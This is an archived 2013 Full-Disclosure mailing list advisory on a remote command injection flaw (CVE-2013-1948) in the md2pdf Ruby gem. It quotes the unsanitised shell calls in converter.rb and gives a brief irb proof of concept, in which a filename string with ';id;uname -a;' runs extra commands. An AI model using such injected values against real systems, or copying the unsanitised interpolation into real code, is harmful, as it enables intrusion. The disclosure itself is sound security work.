lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-id: <3c459dae-8f60-435d-bdb0-c8e2fdc545e5@me.com>
Date: Mon, 15 Apr 2013 13:00:55 +0000 (GMT)
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Cc: Packet Storm <packet@...ketstormsecurity.org>
Subject: Remote command injection md2pdf ruby gem


Remote command injection md2pdf ruby gem
4/10/2013

Description: "creates pdf documents from markdown documents"

https://rubygems.org/gems/md2pdf

In md2pdf/converter.rb we see user supplied input being passed to the command line with out proper sanitization.

 12       shell.exec("pandoc#{options} #{input_filename} -o #{output_filename}")

23 shell.exec("pdftk #{temp_filename} multibackground #{background_path} output #{output_filename}")

Where exec is defined as the following:

 37     def exec(command_line)
 38       require 'open3'
 39       stdin, stdout, stderr = Open3.popen3(command_line)
 40       return stdout.read
 41     end

PoC Notes:

irb(main):001:0> require 'open3'
=> true
irb(main):002:0> stdin, stdout, stderr = Open3.popen3('pdfcnv filename;id;uname -a;.pdft')
=> [#, #, #]
irb(main):003:0> puts stdout.read
uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),117(sambashare)
Linux underfl0w 3.2.0-39-virtual #62-Ubuntu SMP Wed Feb 27 22:45:45 UTC 2013 i686 athlon i386 GNU/Linux
=> nil

http://vapid.dhs.org/advisories/md2pdf-remote-exec.html


This vulnerability has been assigned: CVE-2013-1948

Larry W. Cashdollar
@_larry0



CVE-2013-1948

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ